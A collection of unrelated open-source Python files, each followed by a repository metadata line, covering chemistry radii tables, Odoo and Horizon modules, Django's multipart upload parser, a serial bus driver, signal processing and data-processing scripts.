# Chemistry: A European Journal 15: 186–197. doi:10.1002/chem.200800987
#
# P. Pyykkö, M. Atsumi (2009). "Molecular Double-Bond Covalent Radii for Elements Li–E112".
# Chemistry: A European Journal 15 (46): 12770–12779. doi:10.1002/chem.200901472
#
# P. Pyykkö, S. Riedel, M. Patzschke (2005). "Triple-Bond Covalent Radii".
# Chemistry: A European Journal 11 (12): 3511–3520. doi:10.1002/chem.200401299
#
# Bohr units are used
covalent_radii = np.array([
[0.605, np.nan, np.nan], # H
[0.869, np.nan, np.nan], # He
[2.513, 2.343, np.nan], # Li
[1.928, 1.701, 1.606], # Be
[1.606, 1.474, 1.379], # B
[1.417, 1.266, 1.134], # C
[1.342, 1.134, 1.020], # N
[1.191, 1.077, 1.002], # O
[1.209, 1.115, 1.002], # F
[1.266, 1.814, np.nan], # Ne
[2.929, 3.024, np.nan], # Na
[2.627, 2.494, 2.400], # Mg
[2.381, 2.135, 2.098], # Al
[2.192, 2.022, 1.928], # Si
[2.098, 1.928, 1.776], # P
[1.946, 1.776, 1.795], # S
[1.871, 1.795, 1.757], # Cl
[1.814, 2.022, 1.814], # Ar
[3.704, 3.647, np.nan], # K
[3.231, 2.778, 2.513], # Ca
[2.797, 2.192, 2.154], # Sc
[2.570, 2.211, 2.041], # Ti
[2.532, 2.116, 2.003], # V
[2.305, 2.098, 1.946], # Cr
[2.249, 1.984, 1.946], # Mn
[2.192, 2.060, 1.928], # Fe
[2.098, 1.946, 1.814], # Co
[2.079, 1.909, 1.909], # Ni
[2.116, 2.173, 2.268], # Cu
[2.230, 2.268, np.nan], # Zn
[2.343, 2.211, 2.287], # Ga
[2.287, 2.098, 2.154], # Ge
[2.287, 2.154, 2.003], # As
[2.192, 2.022, 2.022], # Se
[2.154, 2.060, 2.079], # Br
[2.211, 2.287, 2.041], # Kr
[3.968, 3.817, np.nan], # Rb
[3.496, 2.967, 2.627], # Sr
[3.080, 2.457, 2.343], # Y
[2.910, 2.400, 2.287], # Zr
[2.778, 2.362, 2.192], # Nb
[2.608, 2.287, 2.135], # Mo
[2.419, 2.268, 2.079], # Tc
[2.362, 2.154, 1.946], # Ru
[2.362, 2.079, 2.003], # Rh
[2.268, 2.211, 2.116], # Pd
[2.419, 2.627, 2.589], # Ag
[2.570, 2.721, np.nan], # Cd
[2.683, 2.570, 2.759], # In
[2.646, 2.457, 2.494], # Sn
[2.646, 2.513, 2.400], # Sb
[2.570, 2.419, 2.287], # Te
[2.513, 2.438, 2.362], # I
[2.476, 2.551, 2.305], # Xe
[4.384, 3.950, np.nan], # Cs
[3.704, 3.042, 2.816], # Ba
[3.402, 2.627, 2.627], # La
[3.080, 2.589, 2.476], # Ce
[3.326, 2.608, 2.419], # Pr
[3.288, 2.589, np.nan], # Nd
[3.269, 2.551, np.nan], # Pm
[3.250, 2.532, np.nan], # Sm
[3.175, 2.532, np.nan], # Eu
[3.194, 2.551, 2.494], # Gd
[3.175, 2.551, np.nan], # Tb
[3.156, 2.513, np.nan], # Dy
[3.137, 2.513, np.nan], # Ho
[3.118, 2.513, np.nan], # Er
[3.099, 2.476, np.nan], # Tm
[3.213, 2.438, np.nan], # Yb
[3.061, 2.476, 2.476], # Lu
[2.872, 2.419, 2.305], # Hf
[2.759, 2.381, 2.249], # Ta
[2.589, 2.268, 2.173], # W
[2.476, 2.249, 2.079], # Re
[2.438, 2.192, 2.060], # Os
[2.305, 2.173, 2.022], # Ir
[2.324, 2.116, 2.079], # Pt
[2.343, 2.287, 2.324], # Au
[2.513, 2.683, np.nan], # Hg
[2.721, 2.683, 2.835], # Tl
[2.721, 2.551, 2.589], # Pb
[2.853, 2.665, 2.551], # Bi
[2.740, 2.551, 2.438], # Po
[2.778, 2.608, 2.608], # At
[2.683, 2.740, 2.513], # Rn
[4.214, 4.120, np.nan], # Fr
[3.798, 3.269, 3.005], # Ra
[3.515, 2.891, 2.646], # Ac
[3.307, 2.702, 2.570], # Th
[3.194, 2.608, 2.438], # Pa
[3.213, 2.532, 2.230], # U
[3.231, 2.570, 2.192], # Np
[3.250, 2.551, np.nan], # Pu
[3.137, 2.551, np.nan], # Am
[3.137, 2.570, np.nan], # Cm
[3.175, 2.627, np.nan], # Bk
[3.175, 2.646, np.nan], # Cf
[3.118, 2.646, np.nan], # Es
[3.156, np.nan, np.nan], # Fm
[3.269, 2.627, np.nan], # Md
[3.326, np.nan, np.nan], # No
[3.042, 2.665, np.nan], # Lr
[2.967, 2.646, 2.476], # Rf
[2.816, 2.570, 2.381], # Db
[2.702, 2.419, 2.287], # Sg
[2.665, 2.419, 2.249], # Bh
[2.532, 2.362, 2.230], # Hs
[2.438, 2.362, 2.135], # Mt
[2.419, 2.192, 2.116], # Ds
[2.287, 2.192, 2.230], # Rg
[2.305, 2.589, 2.457], # Cn
[2.570, np.nan, np.nan], # Uut
[2.702, np.nan, np.nan], # Fl
[3.061, np.nan, np.nan], # Uup
[3.307, np.nan, np.nan], # Lv
[3.118, np.nan, np.nan], # Uus
[2.967, np.nan, np.nan]]).astype(np.float) # Uuo
def correct_symbol_case(chem_symbol):
"""
correct the chemical symbol to be in the form:
Upperlower
example:
correct_symbol_case('he') -> 'He'
correct_symbol_case('HE') -> 'He'
correct_symbol_case('He') -> 'He'
correct_symbol_case('C') -> 'C'
correct_symbol_case('c') -> 'c'
:param chem_symbol: the chemical symbole to correct
:return: a correct case chemical symbol
"""
# make sure chemical symbol is not longer than 2.
sym_length = len(chem_symbol)
if sym_length > 2:
raise Exception('Found error while reading the chemical symbol \"{}\"'.format(chem_symbol))
elif sym_length == 2:
return chem_symbol[0].upper() + chem_symbol[1].lower()
elif sym_length == 1:
return chem_symbol.upper()
def mass_for_sym(symbol):
"""
:param symbol:
:return: the atomic mass of the chemical symbol
"""
if len(chemical_symbols) != len(atomic_masses):
raise Exception('\"chem_symbol\" list and \"atomic_masses\" numpy array are not '
'the same size.')
try:
index = chemical_symbols.index(symbol)
except ValueError():
print('Chemical symbol \"{}\" does not exist'.format(symbol))
return 0
mass = constants.dict_of_atomic_masses[symbol]
return mass
def number_for_sym(symbol):
"""
:param symbol:
:return: the atomic number of the chemical symbol
"""
try:
number = chemical_symbols.index(symbol)
except ValueError:
print("{} is not a symbol of an atom".format(symbol))
return number
| EhudTsivion/QCkit | atom.py | Python | lgpl-3.0 | 13,288 |
# -*- coding: utf-8 -*-
##############################################################################
#
# This module copyright (C) 2015 Therp BV (<http://therp.nl>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from odoo import models, api
from ..base_suspend_security import BaseSuspendSecurityUid
class IrRule(models.Model):
_inherit = 'ir.rule'
@api.model
def domain_get(self, model_name, mode='read'):
if isinstance(self.env.uid, BaseSuspendSecurityUid):
return [], [], ['"%s"' % self.pool[model_name]._table]
return super(IrRule, self).domain_get(model_name, mode=mode)
| thinkopensolutions/server-tools | base_suspend_security/models/ir_rule.py | Python | agpl-3.0 | 1,346 |
# Copyright (C) 2015 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import forms
from openstack_dashboard.dashboards.identity.identity_providers.protocols \
import forms as protocol_forms
class AddProtocolView(forms.ModalFormView):
template_name = 'identity/identity_providers/protocols/create.html'
form_id = "create_protocol_form"
form_class = protocol_forms.AddProtocolForm
submit_label = _("Create Protocol")
success_url = "horizon:identity:identity_providers:protocols_tab"
page_title = _("Create Protocol")
def __init__(self):
super(AddProtocolView, self).__init__()
def get_success_url(self):
return reverse(self.success_url,
args=(self.kwargs['identity_provider_id'],))
def get_context_data(self, **kwargs):
context = super(AddProtocolView, self).get_context_data(**kwargs)
context["submit_url"] = reverse(
"horizon:identity:identity_providers:protocols:create",
args=(self.kwargs['identity_provider_id'],))
return context
def get_initial(self):
return {"idp_id": self.kwargs['identity_provider_id']}
| noironetworks/horizon | openstack_dashboard/dashboards/identity/identity_providers/protocols/views.py | Python | apache-2.0 | 1,791 |
import random
class intDict(object):
"""A dictionary with integer keys"""
def __init__(self, numBuckets):
"""Create an empty dictionary"""
self.buckets = []
self.numBuckets = numBuckets
for i in range(numBuckets):
self.buckets.append([])
def addEntry(self, dictKey, dictVal):
"""Assumes dictKey an int. Adds an entry."""
hashBucket = self.buckets[dictKey%self.numBuckets]
for i in range(len(hashBucket)):
if hashBucket[i][0] == dictKey:
hashBucket[i] = (dictKey, dictVal)
return
hashBucket.append((dictKey, dictVal))
def getValue(self, dictKey):
"""Assumes dictKey an int. Returns entry associated
with the key dictKey"""
hashBucket = self.buckets[dictKey%self.numBuckets]
for e in hashBucket:
if e[0] == dictKey:
return e[1]
return None
def __str__(self):
res = ''
for b in self.buckets:
for t in b:
res = res + str(t[0]) + ':' + str(t[1]) + ','
return '{' + res[:-1] + '}' #res[:-1] removes the last comma
D = intDict(29)
for i in range(29):
#choose a random int in range(10**5)
key = random.choice(range(10**5))
D.addEntry(key, i)
print '\n', 'The buckets are:'
for hashBucket in D.buckets: #violates abstraction barrier
print ' ', hashBucket
| parmarmanojkumar/MITx_Python | 6002x/week2/lectureCode_intDict.py | Python | mit | 1,482 |
#!/usr/bin/env python
import csv
import json
import sys
import click
def score(company, sexbiases):
"""
Given a company record with board of directors and executive names,
return our guess of the % of governance that is male.
Since names are not always unambiguous determinants of sex, we also
return an error bound, with 0.0 being perfect and 1.0 being possibly 100%
wrong.
"""
men = 0
error = 0.0
governors = company['board'] + company['executives']
# Get all governor names, de-duping since board/exec team may overlap
names = set([governor.get('name', '') for governor in governors])
for name in names:
first_name = name.split(' ')[0].strip().title()
bias = sexbiases.get(first_name, 0.0) # Assume male if not known, with maximal error bound
if bias <= 0.0:
men += 1
error += 1.0 - abs(bias)
count = len(names)
return (men/count, error/count)
@click.command()
@click.option('--companies', type=click.File(mode='rt'), required=True, help="A companies data file, as created by symbol-to-company-details.")
@click.option('--sexbiases', type=click.File(mode='rt'), required=True, help="A sex bias CSV datafile, as in first_name_sex_bias.csv")
def corpscore(companies, sexbiases):
sexbias_reader = csv.reader(sexbiases)
sexbiases = dict([item[0], float(item[1])] for item in sexbias_reader)
fieldnames = ['symbol', 'url', 'percent_men', 'error', 'description']
writer = csv.DictWriter(sys.stdout, fieldnames=fieldnames)
writer.writeheader()
for company_json in companies:
company = json.loads(company_json)
percent_men, error = score(company, sexbiases)
writer.writerow({
'symbol': company['symbol'],
'url': company.get('url'),
'percent_men': percent_men,
'error': error,
'description': company.get('description'),
})
sys.stdout.flush()
if __name__ == '__main__':
corpscore() | hipsterware/scoreline | toys/corpscore.py | Python | agpl-3.0 | 2,066 |
"""
Multi-part parsing for file uploads.
Exposes one class, ``MultiPartParser``, which feeds chunks of uploaded data to
file upload handlers for processing.
"""
import cgi
from django.conf import settings
from django.core.exceptions import SuspiciousOperation
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_unicode
from django.utils.text import unescape_entities
from django.core.files.uploadhandler import StopUpload, SkipFile, StopFutureHandlers
__all__ = ('MultiPartParser', 'MultiPartParserError', 'InputStreamExhausted')
class MultiPartParserError(Exception):
pass
class InputStreamExhausted(Exception):
"""
No more reads are allowed from this device.
"""
pass
RAW = "raw"
FILE = "file"
FIELD = "field"
class MultiPartParser(object):
"""
A rfc2388 multipart/form-data parser.
``MultiValueDict.parse()`` reads the input stream in ``chunk_size`` chunks
and returns a tuple of ``(MultiValueDict(POST), MultiValueDict(FILES))``. If
"""
def __init__(self, META, input_data, upload_handlers, encoding=None):
"""
Initialize the MultiPartParser object.
:META:
The standard ``META`` dictionary in Django request objects.
:input_data:
The raw post data, as a file-like object.
:upload_handler:
An UploadHandler instance that performs operations on the uploaded
data.
:encoding:
The encoding with which to treat the incoming data.
"""
#
# Content-Type should containt multipart and the boundary information.
#
content_type = META.get('HTTP_CONTENT_TYPE', META.get('CONTENT_TYPE', ''))
if not content_type.startswith('multipart/'):
raise MultiPartParserError('Invalid Content-Type: %s' % content_type)
# Parse the header to get the boundary to split the parts.
ctypes, opts = parse_header(content_type)
boundary = opts.get('boundary')
if not boundary or not cgi.valid_boundary(boundary):
raise MultiPartParserError('Invalid boundary in multipart: %s' % boundary)
#
# Content-Length should contain the length of the body we are about
# to receive.
#
try:
content_length = int(META.get('HTTP_CONTENT_LENGTH', META.get('CONTENT_LENGTH',0)))
except (ValueError, TypeError):
# For now set it to 0; we'll try again later on down.
content_length = 0
if content_length < 0:
# This means we shouldn't continue...raise an error.
raise MultiPartParserError("Invalid content length: %r" % content_length)
self._boundary = boundary
self._input_data = input_data
# For compatibility with low-level network APIs (with 32-bit integers),
# the chunk size should be < 2^31, but still divisible by 4.
possible_sizes = [x.chunk_size for x in upload_handlers if x.chunk_size]
self._chunk_size = min([2**31-4] + possible_sizes)
self._meta = META
self._encoding = encoding or settings.DEFAULT_CHARSET
self._content_length = content_length
self._upload_handlers = upload_handlers
def parse(self):
"""
Parse the POST data and break it into a FILES MultiValueDict and a POST
MultiValueDict.
Returns a tuple containing the POST and FILES dictionary, respectively.
"""
# We have to import QueryDict down here to avoid a circular import.
from django.http import QueryDict
encoding = self._encoding
handlers = self._upload_handlers
# HTTP spec says that Content-Length >= 0 is valid
# handling content-length == 0 before continuing
if self._content_length == 0:
return QueryDict(MultiValueDict(), encoding=self._encoding), MultiValueDict()
limited_input_data = LimitBytes(self._input_data, self._content_length)
# See if the handler will want to take care of the parsing.
# This allows overriding everything if somebody wants it.
for handler in handlers:
result = handler.handle_raw_input(limited_input_data,
self._meta,
self._content_length,
self._boundary,
encoding)
if result is not None:
return result[0], result[1]
# Create the data structures to be used later.
self._post = QueryDict('', mutable=True)
self._files = MultiValueDict()
# Instantiate the parser and stream:
stream = LazyStream(ChunkIter(limited_input_data, self._chunk_size))
# Whether or not to signal a file-completion at the beginning of the loop.
old_field_name = None
counters = [0] * len(handlers)
try:
for item_type, meta_data, field_stream in Parser(stream, self._boundary):
if old_field_name:
# We run this at the beginning of the next loop
# since we cannot be sure a file is complete until
# we hit the next boundary/part of the multipart content.
self.handle_file_complete(old_field_name, counters)
old_field_name = None
try:
disposition = meta_data['content-disposition'][1]
field_name = disposition['name'].strip()
except (KeyError, IndexError, AttributeError):
continue
transfer_encoding = meta_data.get('content-transfer-encoding')
if transfer_encoding is not None:
transfer_encoding = transfer_encoding[0].strip()
field_name = force_unicode(field_name, encoding, errors='replace')
if item_type == FIELD:
# This is a post field, we can just set it in the post
if transfer_encoding == 'base64':
raw_data = field_stream.read()
try:
data = str(raw_data).decode('base64')
except:
data = raw_data
else:
data = field_stream.read()
self._post.appendlist(field_name,
force_unicode(data, encoding, errors='replace'))
elif item_type == FILE:
# This is a file, use the handler...
file_name = disposition.get('filename')
if not file_name:
continue
file_name = force_unicode(file_name, encoding, errors='replace')
file_name = self.IE_sanitize(unescape_entities(file_name))
content_type = meta_data.get('content-type', ('',))[0].strip()
try:
charset = meta_data.get('content-type', (0,{}))[1].get('charset', None)
except:
charset = None
try:
content_length = int(meta_data.get('content-length')[0])
except (IndexError, TypeError, ValueError):
content_length = None
counters = [0] * len(handlers)
try:
for handler in handlers:
try:
handler.new_file(field_name, file_name,
content_type, content_length,
charset)
except StopFutureHandlers:
break
for chunk in field_stream:
if transfer_encoding == 'base64':
# We only special-case base64 transfer encoding
try:
chunk = str(chunk).decode('base64')
except Exception, e:
# Since this is only a chunk, any error is an unfixable error.
raise MultiPartParserError("Could not decode base64 data: %r" % e)
for i, handler in enumerate(handlers):
chunk_length = len(chunk)
chunk = handler.receive_data_chunk(chunk,
counters[i])
counters[i] += chunk_length
if chunk is None:
# If the chunk received by the handler is None, then don't continue.
break
except SkipFile, e:
# Just use up the rest of this file...
exhaust(field_stream)
else:
# Handle file upload completions on next iteration.
old_field_name = field_name
else:
# If this is neither a FIELD or a FILE, just exhaust the stream.
exhaust(stream)
except StopUpload, e:
if not e.connection_reset:
exhaust(limited_input_data)
else:
# Make sure that the request data is all fed
exhaust(limited_input_data)
# Signal that the upload has completed.
for handler in handlers:
retval = handler.upload_complete()
if retval:
break
return self._post, self._files
def handle_file_complete(self, old_field_name, counters):
"""
Handle all the signalling that takes place when a file is complete.
"""
for i, handler in enumerate(self._upload_handlers):
file_obj = handler.file_complete(counters[i])
if file_obj:
# If it returns a file object, then set the files dict.
self._files.appendlist(force_unicode(old_field_name,
self._encoding,
errors='replace'),
file_obj)
break
def IE_sanitize(self, filename):
"""Cleanup filename from Internet Explorer full paths."""
return filename and filename[filename.rfind("\\")+1:].strip()
class LazyStream(object):
"""
The LazyStream wrapper allows one to get and "unget" bytes from a stream.
Given a producer object (an iterator that yields bytestrings), the
LazyStream object will support iteration, reading, and keeping a "look-back"
variable in case you need to "unget" some bytes.
"""
def __init__(self, producer, length=None):
"""
Every LazyStream must have a producer when instantiated.
A producer is an iterable that returns a string each time it
is called.
"""
self._producer = producer
self._empty = False
self._leftover = ''
self.length = length
self.position = 0
self._remaining = length
self._unget_history = []
def tell(self):
return self.position
def read(self, size=None):
def parts():
remaining = (size is not None and [size] or [self._remaining])[0]
# do the whole thing in one shot if no limit was provided.
if remaining is None:
yield ''.join(self)
return
# otherwise do some bookkeeping to return exactly enough
# of the stream and stashing any extra content we get from
# the producer
while remaining != 0:
assert remaining > 0, 'remaining bytes to read should never go negative'
chunk = self.next()
emitting = chunk[:remaining]
self.unget(chunk[remaining:])
remaining -= len(emitting)
yield emitting
out = ''.join(parts())
return out
def next(self):
"""
Used when the exact number of bytes to read is unimportant.
This procedure just returns whatever is chunk is conveniently returned
from the iterator instead. Useful to avoid unnecessary bookkeeping if
performance is an issue.
"""
if self._leftover:
output = self._leftover
self._leftover = ''
else:
output = self._producer.next()
self._unget_history = []
self.position += len(output)
return output
def close(self):
"""
Used to invalidate/disable this lazy stream.
Replaces the producer with an empty list. Any leftover bytes that have
already been read will still be reported upon read() and/or next().
"""
self._producer = []
def __iter__(self):
return self
def unget(self, bytes):
"""
Places bytes back onto the front of the lazy stream.
Future calls to read() will return those bytes first. The
stream position and thus tell() will be rewound.
"""
if not bytes:
return
self._update_unget_history(len(bytes))
self.position -= len(bytes)
self._leftover = ''.join([bytes, self._leftover])
def _update_unget_history(self, num_bytes):
"""
Updates the unget history as a sanity check to see if we've pushed
back the same number of bytes in one chunk. If we keep ungetting the
same number of bytes many times (here, 50), we're mostly likely in an
infinite loop of some sort. This is usually caused by a
maliciously-malformed MIME request.
"""
self._unget_history = [num_bytes] + self._unget_history[:49]
number_equal = len([current_number for current_number in self._unget_history
if current_number == num_bytes])
if number_equal > 40:
raise SuspiciousOperation(
"The multipart parser got stuck, which shouldn't happen with"
" normal uploaded files. Check for malicious upload activity;"
" if there is none, report this to the Django developers."
)
class ChunkIter(object):
"""
An iterable that will yield chunks of data. Given a file-like object as the
constructor, this object will yield chunks of read operations from that
object.
"""
def __init__(self, flo, chunk_size=64 * 1024):
self.flo = flo
self.chunk_size = chunk_size
def next(self):
try:
data = self.flo.read(self.chunk_size)
except InputStreamExhausted:
raise StopIteration()
if data:
return data
else:
raise StopIteration()
def __iter__(self):
return self
class LimitBytes(object):
""" Limit bytes for a file object. """
def __init__(self, fileobject, length):
self._file = fileobject
self.remaining = length
def read(self, num_bytes=None):
"""
Read data from the underlying file.
If you ask for too much or there isn't anything left,
this will raise an InputStreamExhausted error.
"""
if self.remaining <= 0:
raise InputStreamExhausted()
if num_bytes is None:
num_bytes = self.remaining
else:
num_bytes = min(num_bytes, self.remaining)
self.remaining -= num_bytes
return self._file.read(num_bytes)
class InterBoundaryIter(object):
"""
A Producer that will iterate over boundaries.
"""
def __init__(self, stream, boundary):
self._stream = stream
self._boundary = boundary
def __iter__(self):
return self
def next(self):
try:
return LazyStream(BoundaryIter(self._stream, self._boundary))
except InputStreamExhausted:
raise StopIteration()
class BoundaryIter(object):
"""
A Producer that is sensitive to boundaries.
Will happily yield bytes until a boundary is found. Will yield the bytes
before the boundary, throw away the boundary bytes themselves, and push the
post-boundary bytes back on the stream.
The future calls to .next() after locating the boundary will raise a
StopIteration exception.
"""
def __init__(self, stream, boundary):
self._stream = stream
self._boundary = boundary
self._done = False
# rollback an additional six bytes because the format is like
# this: CRLF<boundary>[--CRLF]
self._rollback = len(boundary) + 6
# Try to use mx fast string search if available. Otherwise
# use Python find. Wrap the latter for consistency.
unused_char = self._stream.read(1)
if not unused_char:
raise InputStreamExhausted()
self._stream.unget(unused_char)
try:
from mx.TextTools import FS
self._fs = FS(boundary).find
except ImportError:
self._fs = lambda data: data.find(boundary)
def __iter__(self):
return self
def next(self):
if self._done:
raise StopIteration()
stream = self._stream
rollback = self._rollback
bytes_read = 0
chunks = []
for bytes in stream:
bytes_read += len(bytes)
chunks.append(bytes)
if bytes_read > rollback:
break
if not bytes:
break
else:
self._done = True
if not chunks:
raise StopIteration()
chunk = ''.join(chunks)
boundary = self._find_boundary(chunk, len(chunk) < self._rollback)
if boundary:
end, next = boundary
stream.unget(chunk[next:])
self._done = True
return chunk[:end]
else:
# make sure we dont treat a partial boundary (and
# its separators) as data
if not chunk[:-rollback]:# and len(chunk) >= (len(self._boundary) + 6):
# There's nothing left, we should just return and mark as done.
self._done = True
return chunk
else:
stream.unget(chunk[-rollback:])
return chunk[:-rollback]
def _find_boundary(self, data, eof = False):
"""
Finds a multipart boundary in data.
Should no boundry exist in the data None is returned instead. Otherwise
a tuple containing the indices of the following are returned:
* the end of current encapsulation
* the start of the next encapsulation
"""
index = self._fs(data)
if index < 0:
return None
else:
end = index
next = index + len(self._boundary)
# backup over CRLF
if data[max(0,end-1)] == '\n':
end -= 1
if data[max(0,end-1)] == '\r':
end -= 1
return end, next
def exhaust(stream_or_iterable):
"""
Completely exhausts an iterator or stream.
Raise a MultiPartParserError if the argument is not a stream or an iterable.
"""
iterator = None
try:
iterator = iter(stream_or_iterable)
except TypeError:
iterator = ChunkIter(stream_or_iterable, 16384)
if iterator is None:
raise MultiPartParserError('multipartparser.exhaust() was passed a non-iterable or stream parameter')
for __ in iterator:
pass
def parse_boundary_stream(stream, max_header_size):
"""
Parses one and exactly one stream that encapsulates a boundary.
"""
# Stream at beginning of header, look for end of header
# and parse it if found. The header must fit within one
# chunk.
chunk = stream.read(max_header_size)
# 'find' returns the top of these four bytes, so we'll
# need to munch them later to prevent them from polluting
# the payload.
header_end = chunk.find('\r\n\r\n')
def _parse_header(line):
main_value_pair, params = parse_header(line)
try:
name, value = main_value_pair.split(':', 1)
except:
raise ValueError("Invalid header: %r" % line)
return name, (value, params)
if header_end == -1:
# we find no header, so we just mark this fact and pass on
# the stream verbatim
stream.unget(chunk)
return (RAW, {}, stream)
header = chunk[:header_end]
# here we place any excess chunk back onto the stream, as
# well as throwing away the CRLFCRLF bytes from above.
stream.unget(chunk[header_end + 4:])
TYPE = RAW
outdict = {}
# Eliminate blank lines
for line in header.split('\r\n'):
# This terminology ("main value" and "dictionary of
# parameters") is from the Python docs.
try:
name, (value, params) = _parse_header(line)
except:
continue
if name == 'content-disposition':
TYPE = FIELD
if params.get('filename'):
TYPE = FILE
outdict[name] = value, params
if TYPE == RAW:
stream.unget(chunk)
return (TYPE, outdict, stream)
class Parser(object):
def __init__(self, stream, boundary):
self._stream = stream
self._separator = '--' + boundary
def __iter__(self):
boundarystream = InterBoundaryIter(self._stream, self._separator)
for sub_stream in boundarystream:
# Iterate over each part
yield parse_boundary_stream(sub_stream, 1024)
def parse_header(line):
""" Parse the header into a key-value. """
plist = _parse_header_params(';' + line)
key = plist.pop(0).lower()
pdict = {}
for p in plist:
i = p.find('=')
if i >= 0:
name = p[:i].strip().lower()
value = p[i+1:].strip()
if len(value) >= 2 and value[0] == value[-1] == '"':
value = value[1:-1]
value = value.replace('\\\\', '\\').replace('\\"', '"')
pdict[name] = value
return key, pdict
def _parse_header_params(s):
plist = []
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and s.count('"', 0, end) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
plist.append(f.strip())
s = s[end:]
return plist
| JuliBakagianni/CEF-ELRC | lib/python2.7/site-packages/django/http/multipartparser.py | Python | bsd-3-clause | 22,951 |
"""This module implements a serial bus class which talks to bioloid
devices through a serial port.
"""
import serial
from bus import Bus
class SerialBus(Bus):
"""Implements a BioloidBus which sends commands to a bioloid device
via a BioloidSerialPort.
"""
def __init__(self, port, baud=1000000, show=SHOW_NONE):
Bus.__init__(self, show)
self.serial_port = serial.Serial(port=port,
baudrate=baud,
timeout=0.1,
bytesize=serial.EIGHTBITS,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
xonxoff=False,
rtscts=False,
dsrdtr=False)
def read_byte(self):
"""Reads a byte from the bus. This function will return None if
no character was read within the designated timeout.
The max Return Delay time is 254 x 2 usec = 508 usec (the
default is 500 usec). This represents the minimum time between
receiving a packet and sending a response.
"""
data = self.serial_port.read()
if data:
return data[0]
return None
def write_packet(self, packet_data):
"""Function implemented by a derived class which actually writes
the data to a device.
"""
self.serial_port.write(packet_data)
| dhylands/bioloid3 | bioloid/serial_bus.py | Python | mit | 1,568 |
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 5 16:24:58 2019
@author: beimx004
"""
import numpy as np
def channelEnergyFunc(par,X,gAgc):
strat = par['parent'];
startBin = strat['startBin']-1 # subtract 1 for python indexing
nBinLims = strat['nBinLims'];
nHop = strat['nHop']
nFrames = X.shape[1];
nChan = nBinLims.size
assert isinstance(gAgc,np.ndarray) or gAgc.size == 0,'gAgc, if supplied, must be a vector!'
# determine if AGC is sample-based and deciimate to frame rate if necessary
lenAgcIn = gAgc.shape[1]
if lenAgcIn > nFrames:
gAgc = gAgc[:,nHop-1:-1:nHop]
assert np.abs(gAgc.shape[1]-nFrames) <= 3,'Length of sample-based gAgc input incompatable with nr. frames in STFT matrix: length/nHop must = approx nFrames.'
if gAgc.size < nFrames:
gAgc = np.concatenate((gAgc,gAgc[:,-1:]*np.ones((gAgc.shape[0],nFrames-gAgc.shape[1]))),axis=1);
gAgc = gAgc[:,0:nFrames];
elif lenAgcIn > 0 and lenAgcIn < nFrames:
raise ValueError('Length of gAgc input incompatible with number of frames in STFT matrix: length must be >= nr. frames.')
# compute roo-sum-squared FFT magnitudes per channel
engy = np.zeros((nChan,nFrames))
currentBin = startBin;
for iChan in np.arange(nChan):
currBinIdx = np.arange(currentBin,currentBin+nBinLims[iChan])
engy[iChan,:] = np.sum(np.abs(X[currBinIdx,:])**2,axis=0)
currentBin +=nBinLims[iChan]
engy = np.sqrt(engy)
# compensate AGC gain, if applicable
if lenAgcIn > 0:
if par['gainDomain'].lower() == 'linear' or par['gainDomain'].lower() == 'lin':
pass
elif par['gainDomain'].lower() == 'log' or par['gainDomain'].lower() == 'log2':
gAgc = 2**(gAgc/2);
elif par['gainDomain'].lower() == 'db':
gAgc = 10**(gAgc/20);
else:
raise ValueError('Illegal value for parameter ''gainDomain''')
gAgc = np.maximum(gAgc,np.finfo(float).eps)
engy = np.divide(engy,gAgc)
return engy
| jabeim/AB-Generic-Python-Toolbox | GpyT/Filterbank/channelEnergy.py | Python | gpl-3.0 | 2,118 |
import os
root_path = '/Users/CullenGao/LabWork/UbicompLab/data/raw/'
import pandas as pd
import numpy as np
participants = []
for root, dirs, files in os.walk(root_path):
for d in dirs:
if d[0] == 'S':
participants.append(d)
# for par in participants:
par = 'S01'
print par
write_path = '/Users/CullenGao/LabWork/UbicompLab/data/torque_participants/' + par + '.csv'
check_path = '/Users/CullenGao/LabWork/UbicompLab/data/torque_participants/check/' + par + '.csv'
times = []
flag = -1
par_path = root_path + par
for root, dirs, files in os.walk(par_path):
times = dirs
break
for time in times:
time += '/torqueLogs/'
real_path = par_path + '/' + time
for root, dirs, files in os.walk(real_path):
for f in files:
if f[-1] == 'v':
f_path = real_path + f
print f_path
file = pd.read_csv(f_path)
arr_file = np.asarray(file)
col = arr_file.shape[1]
break
new_file = np.empty((0, col + 1))
print col
headers = np.empty((0, col + 1), dtype=str)
# wr = open(write_path, 'a')
# hwr = open('/Users/CullenGao/LabWork/UbicompLab/new/check/' + par + '.csv', 'a')
times = []
par_path = root_path + par
for root, dirs, files in os.walk(par_path):
times = dirs
break
for time in times:
time += '/torqueLogs/'
real_path = par_path + '/' + time
for root, dirs, files in os.walk(real_path):
for f in files:
if f[-1] == 'v':
f_path = real_path + f
print f_path
file = pd.read_csv(f_path)
arr_file = np.asarray(file)
row, col = arr_file.shape
for r in range(row):
for c in range(col):
try:
arr_file[r][c] = float(arr_file[r][c])
except ValueError:
continue
arr_file_ = np.empty((0, col + 1))
# print col
header = np.array(file.columns.values)
header = np.hstack((header, ['flag']))
# print 'header.shape:', header.shape
headers = np.vstack((headers, header))
# print headers.shape
dele = []
for r in range(row):
if arr_file[r][2] != '-' and type(arr_file[r][2]) is not float:
headers = np.vstack((headers, np.hstack((arr_file[r], ['flag']))))
dele.append(r)
continue
# for c in range(col):
# if arr_file[r][c] == '-':
# dele.append(r)
# break
